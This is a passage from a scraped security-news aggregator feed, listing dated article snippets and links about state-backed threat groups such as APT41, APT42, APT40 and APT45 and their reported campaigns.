of Iran\'s IRGC Intelligence Organization (IRGC-IO). This campaign\'s activities are in line with Iran\'s IRGC and APT42\'s history of conducting surveillance operations against domestic threats and individuals of interest to the Iranian government. Despite the possible APT42 connection, Mandiant observed no relations between this activity and any U.S. elections-related targeting as previously reported by Google\'s Threat Analysis Group. The activity used multiple social media accounts to disseminate a network of over 35 fake recruiting websites containing extensive Farsi decoy content, including job offers and Israel-related lures, such as images of Israeli national symbols, hi-tech offices, and major city landmarks. Upon entry, the targeted users are required to enter their personal details as well as their professional and academic experience, which are subsequently sent to the attackers.  The suspected counterintelligence operations started as early as 2017 and lasted at least until March 2024. In the past, similar campaigns were deployed in Arabic, targeting individuals affiliated with Syria and Hezbollah intelligence and security agencies. This may indicate Iran\'s counterintelligence activities extend beyond its own security and intelligence apparatus, possibly in support of its allies in Syria and Lebanon.  Mandiant worked to help ensure this activity was blocked and disrupted, the threat actor\'s accounts were terminated, and Google Chrome users and the users of other browsers were protected.]]> 2024-08-28T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/ www.secnews.physaphae.fr/article.php?IdArticle=8565655 False Threat,Mobile,Cloud APT 42 4.0000000000000000 Dark Reading - Informationweek Branch A threat actor resembling APT41 performed "AppDomainManager Injection," which is like DLL sideloading, but arguably easier and stealthier.]]> 2024-08-26T21:33:17+00:00 https://www.darkreading.com/application-security/hackers-use-rare-stealth-techniques-to-down-asian-military-govt-orgs www.secnews.physaphae.fr/article.php?IdArticle=8564337 False Threat APT 41 2.0000000000000000 ProofPoint - Cyber Firms 2024-08-20T05:00:25+00:00 https://www.proofpoint.com/us/blog/threat-insight/best-laid-plans-ta453-targets-religious-figure-fake-podcast-invite-delivering www.secnews.physaphae.fr/article.php?IdArticle=8560720 False Malware,Threat,Studies APT 35,APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-08-19T10:58:28+00:00 https://community.riskiq.com/article/256c3cbd www.secnews.physaphae.fr/article.php?IdArticle=8560248 False Ransomware,Malware,Tool,Threat,Prediction APT 41,APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-08-15T22:02:58+00:00 https://community.riskiq.com/article/97bee087 www.secnews.physaphae.fr/article.php?IdArticle=8558380 True Spam,Malware,Tool,Threat,Industrial APT 42 3.0000000000000000 Dark Reading - Informationweek Branch The threat group tracked as APT42 remains on the warpath with various phishing and other social engineering campaigns, as tensions with Israel rise.]]> 2024-08-15T17:21:38+00:00 https://www.darkreading.com/cyberattacks-data-breaches/google-iran-charming-kitten-targets-presidential-elections-israeli-military www.secnews.physaphae.fr/article.php?IdArticle=8558263 False Threat APT 35,APT 42 3.0000000000000000 The Register - Site journalistique Anglais US politicians and Israeli officials among the top targets for the IRGC\'s cyber unit Google has joined Microsoft in publishing intel on Iranian cyber influence activity following a recent uptick in attacks that led to data being leaked from the Trump re-election campaign.…]]> 2024-08-15T16:30:59+00:00 https://go.theregister.com/feed/www.theregister.com/2024/08/15/google_iran_apt42_campaigns/ www.secnews.physaphae.fr/article.php?IdArticle=8558233 False None APT 42 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Google has highlighted sophisticated spearphishing attacks by Iranian state actor APT42 targeting individuals associated with the US Presidential campaign]]> 2024-08-15T11:10:00+00:00 https://www.infosecurity-magazine.com/news/google-iranian-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8558090 False None APT 42 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The China-backed threat actor known as Earth Baku has diversified its targeting footprint beyond the Indo-Pacific region to include Europe, the Middle East, and Africa starting in late 2022. Newly targeted countries as part of the activity include Italy, Germany, the U.A.E., and Qatar, with suspected attacks also detected in Georgia and Romania. Governments, media and communications, telecoms,]]> 2024-08-14T10:31:00+00:00 https://thehackernews.com/2024/08/china-backed-earth-baku-expands-cyber.html www.secnews.physaphae.fr/article.php?IdArticle=8557427 False Threat APT 41 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-08-12T19:53:21+00:00 https://community.riskiq.com/article/23e31fb6 www.secnews.physaphae.fr/article.php?IdArticle=8556555 False Malware,Tool,Threat,Medical APT 41 3.0000000000000000 Dark Reading - Informationweek Branch Earth Baku, yet another subgroup of the highly active and increasingly sophisticated collective, is moving into EMEA with new malware and living-off-the-land (LOL) tactics.]]> 2024-08-12T14:30:31+00:00 https://www.darkreading.com/cyberattacks-data-breaches/apt41-spinoff-expands-chinese-actor-scope-beyond-asia www.secnews.physaphae.fr/article.php?IdArticle=8557118 False Malware APT 41 3.0000000000000000 TrendLabs Security - Editeur Antivirus Earth Baku has broadened its scope from the Indo-Pacific region to Europe, the Middle East, and Africa. In this blog entry, we examine the threat actor\'s latest tools, tactics, and procedures.]]> 2024-08-09T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/h/earth-baku-latest-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=8554460 False Tool,Threat APT 41 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korea-linked threat actor known as Kimsuky has been linked to a new set of attacks targeting university staff, researchers, and professors for intelligence gathering purposes. Cybersecurity firm Resilience said it identified the activity in late July 2024 after it observed an operation security (OPSEC) error made by the hackers. Kimsuky, also known by the names APT43, ARCHIPELAGO,]]> 2024-08-08T21:01:00+00:00 https://thehackernews.com/2024/08/university-professors-targeted-by-north.html www.secnews.physaphae.fr/article.php?IdArticle=8554152 False Threat APT 43 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine A new study from the Chartered Management Institute finds just half of firms offer regular security training]]> 2024-08-07T10:00:00+00:00 https://www.infosecurity-magazine.com/news/uk-managers-improve-cyber/ www.secnews.physaphae.fr/article.php?IdArticle=8553315 False Studies APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-08-05T10:51:17+00:00 https://community.riskiq.com/article/ed438f56 www.secnews.physaphae.fr/article.php?IdArticle=8552050 False Ransomware,Spam,Malware,Tool,Vulnerability,Threat,Mobile APT33,APT 41,APT 33,APT-C-17 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A Taiwanese government-affiliated research institute that specializes in computing and associated technologies was breached by nation-state threat actors with ties to China, according to new findings from Cisco Talos. The unnamed organization was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-compromise tools like ShadowPad and Cobalt Strike. It has been attributed]]> 2024-08-02T22:02:00+00:00 https://thehackernews.com/2024/08/apt41-hackers-use-shadowpad-cobalt.html www.secnews.physaphae.fr/article.php?IdArticle=8549909 False Tool,Threat APT 41 3.0000000000000000 Dark Reading - Informationweek Branch The state-sponsored Chinese threat actor gained access to three systems and stole at least some research data around computing and related technologies.]]> 2024-08-02T19:20:49+00:00 https://www.darkreading.com/threat-intelligence/chinas-apt41-targets-taiwan-research-institute-for-cyber-espionage www.secnews.physaphae.fr/article.php?IdArticle=8550033 False Threat APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-08-01T18:42:27+00:00 https://community.riskiq.com/article/d791dc39 www.secnews.physaphae.fr/article.php?IdArticle=8549111 False Malware,Tool,Vulnerability,Threat APT 41 3.0000000000000000 Recorded Future - FLux Recorded Future 2024-08-01T17:27:04+00:00 https://therecord.media/taiwan-government-backed-research-institution-apt41-hack www.secnews.physaphae.fr/article.php?IdArticle=8549044 False None APT 41 3.0000000000000000 Mandiant - Blog Sécu de Mandiant   Executive Summary APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009. APT45 has gradually expanded into financially-motivated operations, and the group\'s suspected development and deployment of ransomware sets it apart from other North Korean operators.  APT45 and activity clusters suspected of being linked to the group are strongly associated with a distinct genealogy of malware families separate from peer North Korean operators like TEMP.Hermit and APT43.  Among the groups assessed to operate from the Democratic People\'s Republic of Korea (DPRK), APT45 has been the most frequently observed targeting critical infrastructure. Overview Mandiant assesses with high confidence that APT45 is a moderately sophisticated cyber operator that supports the interests of the DPRK. Since at least 2009, APT45 has carried out a range of cyber operations aligned with the shifting geopolitical interests of the North Korean state. Although the group\'s earliest observed activities consisted of espionage campaigns against government agencies and defense industries, APT45 has expanded its remit to financially-motivated operations, including targeting of the financial vertical; we also assess with moderate confidence that APT45 has engaged in the development of ransomware. Additionally, while multiple DPRK-nexus groups focused on healthcare and pharmaceuticals during the initial stages of the COVID-19 pandemic, APT45 has continued to target this vertical longer than other groups, suggesting an ongoing mandate to collect related information. Separately, the group has conducted operations against nuclear-related entities, underscoring its role in supporting DPRK priorities. Shifts in Targeting and Expanding Operations Similar to other cyber threat activity attributed to North Korea-nexus groups, shifts in APT45 operations have reflected the DPRK\'s changing priorities. Malware samples indicate the group was active as early as 2009, although an observed focus on government agencies and the defense industry was observed beginning in 2017. Identified activity in 2019 aligned with Pyongyang\'s continued interest in nuclear issues and energy. Although it is not clear if financially-motivated operations are a focus of APT45\'s current mandate, the group is distinct from other North Korean operators in its suspected interest in ransomware. Given available information, it is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities. Financial Sector Like other North Korea]]> 2024-07-25T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/apt45-north-korea-digital-military-machine/ www.secnews.physaphae.fr/article.php?IdArticle=8544047 False Ransomware,Malware,Tool,Threat,Medical APT 37,APT 43 5.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-07-22T10:33:31+00:00 https://community.riskiq.com/article/12ac549a www.secnews.physaphae.fr/article.php?IdArticle=8541988 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Prediction,Cloud APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-07-19T18:51:32+00:00 https://community.riskiq.com/article/3ecd0e46 www.secnews.physaphae.fr/article.php?IdArticle=8540438 False Malware,Tool,Threat,Medical,Cloud APT 41 3.0000000000000000 Dark Reading - Informationweek Branch According to Mandiant, among the many cyber espionage tools the threat actor is using is a sophisticated new dropper called DustTrap.]]> 2024-07-19T14:00:00+00:00 https://www.darkreading.com/threat-intelligence/china-apt41-targets-global-logistics-utilities www.secnews.physaphae.fr/article.php?IdArticle=8540255 False Tool,Threat APT 41 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Several organizations operating within global shipping and logistics, media and entertainment, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. have become the target of a "sustained campaign" by the prolific China-based APT41 hacking group. "APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims\' networks since]]> 2024-07-19T12:54:00+00:00 https://thehackernews.com/2024/07/apt41-infiltrates-networks-in-italy.html www.secnews.physaphae.fr/article.php?IdArticle=8540107 False None APT 41 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial La société de renseignement sur les menaces Mandiant en collaboration avec le groupe d'analyse des menaces de Google (TAG) a observé une campagne soutenue par le ...

---

>Threat intelligence firm Mandiant in collaboration with Google\'s Threat Analysis Group (TAG) observed a sustained campaign by the... ]]> 2024-07-19T10:54:39+00:00 https://industrialcyber.co/ransomware/mandiant-and-google-tag-detail-apt41-cyber-campaign-targeting-global-industries/ www.secnews.physaphae.fr/article.php?IdArticle=8540163 False Threat APT 41 3.0000000000000000 Mandiant - Blog Sécu de Mandiant   Executive Summary In collaboration with Google\'s Threat Analysis Group (TAG), Mandiant has observed a sustained campaign by the advanced persistent threat group APT41 targeting and successfully compromising multiple organizations operating within the global shipping and logistics, media and entertainment, technology, and automotive sectors. The majority of organizations were operating in Italy, Spain, Taiwan, Thailand, Turkey, and the United Kingdom. APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims\' networks since 2023, enabling them to extract sensitive data over an extended period.  APT41 used a combination of ANTSWORD and BLUEBEAM web shells for the execution of DUSTPAN to execute BEACON backdoor for command-and-control communication. Later in the intrusion, APT41 leveraged DUSTTRAP, which would lead to hands-on keyboard activity. APT41 used publicly available tools SQLULDR2 for copying data from databases and PINEGROVE to exfiltrate data to Microsoft OneDrive. Overview Recently, Mandiant became aware of an APT41 intrusion where the malicious actor deployed a combination of ANTSWORD and BLUEBEAM web shells for persistence. These web shells were identified on a Tomcat Apache Manager server and active since at least 2023. APT41 utilized these web shells to execute certutil.exe to download the DUSTPAN dropper to stealthily load BEACON.  As the APT41 intrusion progressed, the group escalated its tactics by deploying the DUSTTRAP dropper. Upon execution, DUSTTRAP would decrypt a malicious payload and execute it in memory, leaving minimal forensic traces. The decrypted payload was designed to establish communication channels with either APT41-controlled infrastructure for command and control or, in some instances, with a compromised Google Workspace account, further blending its malicious activities with legitimate traffic. The affected Google Workspace accounts have been successfully remediated to prevent further unauthorized access. Furthermore, APT41 leveraged SQLULDR2 to export data from Oracle Databases, and used PINEGROVE to systematically and efficiently exfiltrate large volumes of sensitive data from the compromised networks, transferring to OneDrive to enable exfiltration and subsequent analysis. ]]> 2024-07-18T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust/ www.secnews.physaphae.fr/article.php?IdArticle=8539580 False Ransomware,Malware,Tool,Threat,Patching,Medical,Cloud APT 41 2.0000000000000000 IndustrialCyber - cyber risk firms for industrial U.S. Senator Mark R. Warner calls upon the administration to swiftly develop and implement mandatory minimum cyber standards... ]]> 2024-07-17T13:42:31+00:00 https://industrialcyber.co/medical/senator-warner-pushes-for-immediate-action-on-mandatory-cybersecurity-standards-for-healthcare-sector/ www.secnews.physaphae.fr/article.php?IdArticle=8538878 False Industrial,Medical APT 42 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-07-15T11:27:07+00:00 https://community.riskiq.com/article/fdcb22e4 www.secnews.physaphae.fr/article.php?IdArticle=8537522 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Prediction,Medical APT 41,APT 40 2.0000000000000000 The Register - Site journalistique Anglais Meet DodgeBox, son of StealthVector Chinese government-backed cyber espionage gang APT41 has very likely added a loader dubbed DodgeBox and a backdoor named MoonWalk to its malware toolbox, according to cloud security service provider Zscaler\'s ThreatLabz research team.…]]> 2024-07-12T01:29:11+00:00 https://go.theregister.com/feed/www.theregister.com/2024/07/12/china_apt41_malware/ www.secnews.physaphae.fr/article.php?IdArticle=8535375 False Malware,Cloud APT 41 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot In April 2024, Zscaler ThreatLabz discovered a new loader named DodgeBox, an upgraded and evolved version of StealthVector, a tool previously used by the Chinese APT group, APT41, tracked by Microsoft as [Brass Typhoon](https://security.microsoft.com/intel-profiles/byExternalId/e49c4119afe798db103058c3ffda5bd85e83534940247449478524d61ae6817a). ## Description After their analysis of DodgeBox, researchers from Zscaler ThreatLabz assess that the malware is an enhanced version of StealthVector loader as there are significant similarities between the two malwares. Written in C, DodgeBox is a reflective DLL loader that has a number of attributes, including the ability to decrypt and load embedded DLLs, perform environment checks, and carry out cleanup procedures. Notably, DodgeBox also employs call stack spoofing, a technique used by malware to obfuscate the origins of API calls, making it difficult for Endpoint Detection and Response (EDR) solutions and antivirus programs to detect the malware. DodgeBox has been used by APT41 to deliver the MoonWalk backdoor, a new backdoor being employed by the threat group.  DodgeBox and StealthVector both have similarities in their:  - checksum and configuration decryption, - decrypted conf]]> 2024-07-11T22:03:33+00:00 https://community.riskiq.com/article/3524d2ae www.secnews.physaphae.fr/article.php?IdArticle=8535322 False Malware,Tool,Threat,Patching APT 41 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The China-linked advanced persistent threat (APT) group codenamed APT41 is suspected to be using an "advanced and upgraded version" of a known malware called StealthVector to deliver a previously undocumented backdoor dubbed MoonWalk. The new variant of StealthVector – which is also referred to as DUSTPAN – has been codenamed DodgeBox by Zscaler ThreatLabz, which discovered the loader strain in]]> 2024-07-11T18:01:00+00:00 https://thehackernews.com/2024/07/chinese-apt41-upgrades-malware-arsenal.html www.secnews.physaphae.fr/article.php?IdArticle=8534993 False Malware,Threat APT 41 3.0000000000000000 HackRead - Chercher Cyber Australia isn’t alone! The Five Eyes (US, UK, Canada, NZ) along with Japan and South Korea join forces…]]> 2024-07-10T13:30:41+00:00 https://hackread.com/five-eyes-blames-chinese-apt40-for-govt-hacks/ www.secnews.physaphae.fr/article.php?IdArticle=8534284 False None APT 40 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-07-09T19:47:09+00:00 https://community.riskiq.com/article/e8378a00 www.secnews.physaphae.fr/article.php?IdArticle=8533748 False Malware,Tool,Vulnerability,Threat,Patching,Legislation,Industrial APT 40 3.0000000000000000 Dark Reading - Informationweek Branch The state-sponsored threat group is capable of exploiting fresh software vulnerabilities within hours of their initial discovery.]]> 2024-07-09T17:08:06+00:00 https://www.darkreading.com/endpoint-security/chinese-apt40-exploits-nday-vulns-rapid-pace www.secnews.physaphae.fr/article.php?IdArticle=8533656 False Vulnerability,Threat APT 40 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine A joint government advisory warned that the Chinese state-sponsored actor APT40 is capable of immediately exploiting newly public vulnerabilities in widely used software]]> 2024-07-09T12:30:00+00:00 https://www.infosecurity-magazine.com/news/chinese-state-exploits/ www.secnews.physaphae.fr/article.php?IdArticle=8533475 False Vulnerability APT 40 4.0000000000000000 IndustrialCyber - cyber risk firms for industrial Transnational cybersecurity agencies release an advisory outlining a People\'s Republic of China (PRC) state-sponsored cyber group and their... ]]> 2024-07-09T11:49:18+00:00 https://industrialcyber.co/cisa/global-agencies-warn-of-prcs-apt40-cyber-threats-targeting-australian-international-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8533440 False None APT 40 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have released a joint advisory about a China-linked cyber espionage group called APT40, warning about its ability to co-opt exploits for newly disclosed security flaws within hours or days of public release. "APT 40 has previously targeted organizations in various countries, including]]> 2024-07-09T11:26:00+00:00 https://thehackernews.com/2024/07/cybersecurity-agencies-warn-of-china.html www.secnews.physaphae.fr/article.php?IdArticle=8533291 False Threat APT 40 3.0000000000000000 The Register - Site journalistique Anglais Lax patching and vulnerable small biz kit make life easy for Beijing\'s secret-stealers Law enforcement agencies from eight nations, led by Australia, have issued an advisory that details the tradecraft used by China-aligned threat actor APT40 – aka Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk – and found it prioritizes developing exploits for newly found vulnerabilities and can target them within hours.…]]> 2024-07-09T02:33:07+00:00 https://go.theregister.com/feed/www.theregister.com/2024/07/09/apt_40_tradecraft_advisory/ www.secnews.physaphae.fr/article.php?IdArticle=8533187 False Vulnerability,Threat,Patching,Legislation APT 40 3.0000000000000000 Mandiant - Blog Sécu de Mandiant   Following the discovery of malware residing within ESXi hypervisors in September 2022, Mandiant began investigating numerous intrusions conducted by UNC3886, a suspected China-nexus cyber espionage actor that has targeted prominent strategic organizations on a global scale. In January 2023, Mandiant provided detailed analysis of the exploitation of a now-patched vulnerability in FortiOS employed by a threat actor suspected to be UNC3886. In March 2023, we provided details surrounding a custom malware ecosystem utilized on affected Fortinet devices. Furthermore, the investigation uncovered the compromise of VMware technologies, which facilitated access to guest virtual machines. Investigations into more recent operations in 2023 following fixes from the vendors involved in the investigation have corroborated Mandiant\'s initial observations that the actor operates in a sophisticated, cautious, and evasive nature. Mandiant has observed that UNC3886 employed several layers of organized persistence for redundancy to maintain access to compromised environments over time. Persistence mechanisms encompassed network devices, hypervisors, and virtual machines, ensuring alternative channels remain available even if the primary layer is detected and eliminated. This blog post discusses UNC3886\'s intrusion path and subsequent actions that were performed in the environments after compromising the guest virtual machines to achieve access to the critical systems, including: The use of publicly available rootkits for long-term persistence Deployment of malware that leveraged trusted third-party services for command and control (C2 or C&C) Subverting access and collecting credentials with Secure Shell (SSH) backdoors Extracting credentials from TACACS+ authentication using custom malware  Mandiant has published detection and hardening guidelines for ESXi hypervisors and attack techniques employed by UNC3886. For Google SecOps Enterprise+ customer]]> 2024-06-18T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations/ www.secnews.physaphae.fr/article.php?IdArticle=8520461 False Malware,Tool,Vulnerability,Threat,Cloud,Technical APT 41 3.0000000000000000 HackRead - Chercher Cyber Synopsys warns of a new prompt injection hack involving a security vulnerability in EmailGPT, a popular AI email…]]> 2024-06-06T20:46:03+00:00 https://hackread.com/emailgpt-flaw-user-data-at-risk-remove-extension/ www.secnews.physaphae.fr/article.php?IdArticle=8514311 False Hack,Vulnerability APT 42 2.0000000000000000 Mandiant - Blog Sécu de Mandiant   Executive Summary  Mandiant assesses with high confidence that the Paris Olympics faces an elevated risk of cyber threat activity, including cyber espionage, disruptive and destructive operations, financially-motivated activity, hacktivism, and information operations.  Olympics-related cyber threats could realistically impact various targets including event organizers and sponsors, ticketing systems, Paris infrastructure, and athletes and spectators traveling to the event.  Mandiant assesses with high confidence that Russian threat groups pose the highest risk to the Olympics. While China, Iran, and North Korea state sponsored actors also pose a moderate to low risk. To reduce the risk of cyber threats associated with the Paris Olympics, organizations should update their threat profiles, conduct security awareness training, and consider travel-related cyber risks. The security community is better prepared for the cyber threats facing the Paris Olympics than it has been for previous Games, thanks to the insights gained from past events. While some entities may face unfamiliar state-sponsored threats, many of the cybercriminal threats will be familiar. While the technical disruption caused by hacktivism and information operations is often temporary, these operations can have an outsized impact during high-profile events with a global audience. Introduction  The 2024 Summer Olympics taking place in Paris, France between July and August creates opportunities for a range of cyber threat actors to pursue profit, notoriety, and intelligence. For organizations involved in the event, understanding relevant threats is key to developing a resilient security posture. Defenders should prepare against a variety of threats that will likely be interested in targeting the Games for different reasons:  Cyber espionage groups are likely to target the 2024 Olympics for information gathering purposes, due to the volume of government officials and senior decision makers attending. Disruptive and destructive operations could potentially target the Games to cause negative psychological effects and reputational damage. This type of activity could take the form of website defacements, distributed denial of service (DDoS) attacks, the deployment of wiper malware, and operational technology (OT) targeting. As a high profile, large-scale sporting event with a global audience, the Olympics represents an ideal stage for such operations given that the impact of any disruption would be significantly magnified.  Information operations will likely leverage interest in the Olympics to spread narratives and disinformation to target audiences. In some cases, threat actors may leverage disruptive and destructive attacks to amplify the spread of particular narratives in hybrid operations. Financially-motivated actors are likely to target the Olympics in v]]> 2024-06-05T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-2024-paris-olympics/ www.secnews.physaphae.fr/article.php?IdArticle=8513588 False Ransomware,Malware,Threat,Studies,Mobile,Cloud,Technical APT 15,APT 31,APT 42 2.0000000000000000 DarkTrace - DarkTrace: AI bases detection Analyzing how the cyber-criminal group APT41 exploited a zero-day vulnerability, we show how Darktrace\'s AI detected and investigated the threat immediately.]]> 2024-05-30T02:45:40+00:00 https://darktrace.com/blog/catching-apt41-exploiting-a-zero-day-vulnerability www.secnews.physaphae.fr/article.php?IdArticle=8509713 False Vulnerability,Threat APT 41 3.0000000000000000 Bleeping Computer - Magazine Américain The North Korean hacker group Kimsuki has been using a new Linux malware called Gomir that is a version of the GoBear backdoor delivered via trojanized software installers. [...]]]> 2024-05-16T09:28:37+00:00 https://www.bleepingcomputer.com/news/security/kimsuky-hackers-deploy-new-linux-backdoor-in-attacks-on-south-korea/ www.secnews.physaphae.fr/article.php?IdArticle=8501038 False Malware APT 43 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-13T13:30:14+00:00 https://community.riskiq.com/article/fd207107 www.secnews.physaphae.fr/article.php?IdArticle=8498946 False Spam,Malware,Tool,Vulnerability,Threat,Cloud APT 42 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Iranian state-backed hacking outfit called APT42 is making use of enhanced social engineering schemes to infiltrate target networks and cloud environments. Targets of the attack include Western and Middle Eastern NGOs, media organizations, academia, legal services and activists, Google Cloud subsidiary Mandiant said in a report published last week. "APT42 was]]> 2024-05-07T18:55:00+00:00 https://thehackernews.com/2024/05/apt42-hackers-pose-as-journalists-to.html www.secnews.physaphae.fr/article.php?IdArticle=8495241 False Cloud APT 42 4.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-06T19:54:46+00:00 https://community.riskiq.com/article/7c5aa156 www.secnews.physaphae.fr/article.php?IdArticle=8494794 False Malware,Vulnerability,Threat,Patching,Cloud APT 42 3.0000000000000000 Bleeping Computer - Magazine Américain The Iranian state-backed threat actor tracked as APT42 is employing social engineering attacks, including posing as journalists, to breach corporate networks and cloud environments of Western and Middle Eastern targets. [...]]]> 2024-05-04T10:17:34+00:00 https://www.bleepingcomputer.com/news/security/iranian-hackers-pose-as-journalists-to-push-backdoor-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8493646 False Malware,Threat,Cloud APT 42 3.0000000000000000 Mandiant - Blog Sécu de Mandiant   APT42, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain access to victim networks, including cloud environments. The actor is targeting Western and Middle Eastern NGOs, media organizations, academia, legal services and activists. Mandiant assesses APT42 operates on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO). APT42 was observed posing as journalists and event organizers to build trust with their victims through ongoing correspondence, and to deliver invitations to conferences or legitimate documents. These social engineering schemes enabled APT42 to harvest credentials and use them to gain initial access to cloud environments. Subsequently, the threat actor covertly exfiltrated data of strategic interest to Iran, while relying on built-in features and open-source tools to avoid detection. In addition to cloud operations, we also outline recent malware-based APT42 operations using two custom backdoors: NICECURL and TAMECAT. These backdoors are delivered via spear phishing, providing the attackers with initial access that might be used as a command execution interface or as a jumping point to deploy additional malware. APT42 targeting and missions are consistent with its assessed affiliation with the IRGC-IO, which is a part of the Iranian intelligence apparatus that is responsible for monitoring and preventing foreign threats to the Islamic Republic and domestic unrest. APT42 activities overlap with the publicly reported actors CALANQUE (Google Threat Analysis Group), Charming Kitten (ClearSky and CERTFA), Mint Sandstorm/Phosphorus (Microsoft), TA453 (Proofpoint), Yellow Garuda (PwC), and ITG18 (]]> 2024-05-01T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/ www.secnews.physaphae.fr/article.php?IdArticle=8500390 False Malware,Tool,Threat,Cloud Yahoo,APT 35,APT 42 2.0000000000000000 Mandiant - Blog Sécu de Mandiant   Executive Summary The election cybersecurity landscape globally is characterized by a diversity of targets, tactics, and threats. Elections attract threat activity from a variety of threat actors including: state-sponsored actors, cyber criminals, hacktivists, insiders, and information operations as-a-service entities. Mandiant assesses with high confidence that state-sponsored actors pose the most serious cybersecurity risk to elections. Operations targeting election-related infrastructure can combine cyber intrusion activity, disruptive and destructive capabilities, and information operations, which include elements of public-facing advertisement and amplification of threat activity claims. Successful targeting does not automatically translate to high impact. Many threat actors have struggled to influence or achieve significant effects, despite their best efforts.  When we look across the globe we find that the attack surface of an election involves a wide variety of entities beyond voting machines and voter registries. In fact, our observations of past cycles indicate that cyber operations target the major players involved in campaigning, political parties, news and social media more frequently than actual election infrastructure.   Securing elections requires a comprehensive understanding of many types of threats and tactics, from distributed denial of service (DDoS) to data theft to deepfakes, that are likely to impact elections in 2024. It is vital to understand the variety of relevant threat vectors and how they relate, and to ensure mitigation strategies are in place to address the full scope of potential activity.  Election organizations should consider steps to harden infrastructure against common attacks, and utilize account security tools such as Google\'s Advanced Protection Program to protect high-risk accounts. Introduction  The 2024 global election cybersecurity landscape is characterized by a diversity of targets, tactics, and threats. An expansive ecosystem of systems, administrators, campaign infrastructure, and public communications venues must be secured against a diverse array of operators and methods. Any election cybersecurity strategy should begin with a survey of the threat landscape to build a more proactive and tailored security posture.  The cybersecurity community must keep pace as more than two billion voters are expected to head to the polls in 2024. With elections in more than an estimated 50 countries, there is an opportunity to dynamically track how threats to democracy evolve. Understanding how threats are targeting one country will enable us to better anticipate and prepare for upcoming elections globally. At the same time, we must also appreciate the unique context of different countries. Election threats to South Africa, India, and the United States will inevitably differ in some regard. In either case, there is an opportunity for us to prepare with the advantage of intelligence.  ]]> 2024-04-25T10:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-global-elections/ www.secnews.physaphae.fr/article.php?IdArticle=8500393 False Ransomware,Malware,Hack,Tool,Vulnerability,Threat,Legislation,Cloud,Technical APT 40,APT 29,APT 28,APT 43,APT 31,APT 42 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Proofpoint confirmed Kimsuky has directly contacted foreign policy experts since 2023 through seemingly benign email conversations]]> 2024-04-17T15:30:00+00:00 https://www.infosecurity-magazine.com/news/kimsuky-exploits-dmarc-web-beacons/ www.secnews.physaphae.fr/article.php?IdArticle=8484216 False None APT 43 3.0000000000000000 ProofPoint - Cyber Firms 2024-04-16T06:00:54+00:00 https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering www.secnews.physaphae.fr/article.php?IdArticle=8483299 False Malware,Tool,Threat,Conference APT 37,APT 43 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Sysdig stated that by deploying multiple miners, the group decreased attack time and detection risk]]> 2024-04-09T14:30:00+00:00 https://www.infosecurity-magazine.com/news/rubycarps-multi-miner-assault/ www.secnews.physaphae.fr/article.php?IdArticle=8478743 False None APT 40 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-04-08T15:09:15+00:00 https://community.riskiq.com/article/974639f2 www.secnews.physaphae.fr/article.php?IdArticle=8478203 False Ransomware,Spam,Malware,Tool,Threat,Cloud APT 41 3.0000000000000000